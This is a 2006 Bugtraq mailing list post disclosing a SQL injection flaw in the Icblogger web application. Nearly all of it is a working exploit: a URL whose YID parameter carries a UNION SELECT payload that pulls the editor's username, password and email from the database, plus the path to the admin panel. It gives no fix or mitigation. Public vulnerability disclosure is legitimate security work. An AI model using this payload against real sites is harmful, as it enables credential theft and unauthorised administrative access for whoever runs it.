Bugtraq mailing list archives

Icblogger <= "YID" Remote Blind SQL Injection


From: ChironeX.FleckeriX () Gmail Com
Date: 1 Sep 2006 18:49:01 -0000

################################################################################
##                                                                            ##

##  Icblogger <= "YID" Remote Blind SQL Injection                             ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##

##  Credit by        |  Chironex Fleckeri                                     ##

##  Mail             |  ChironeX.FleckeriX () Gmail Com                          ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##

##                                                                            ##
################################################################################

##########################################################################################################################################################################
#Usage : http://www.target.com/path/devam.asp?YID=-1 UNION SELECT 
null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 #
##########################################################################################################################################################################

#############################################################
#Admin Panel : http://www.target.com/path/admin/default.asp #
#############################################################


Current thread: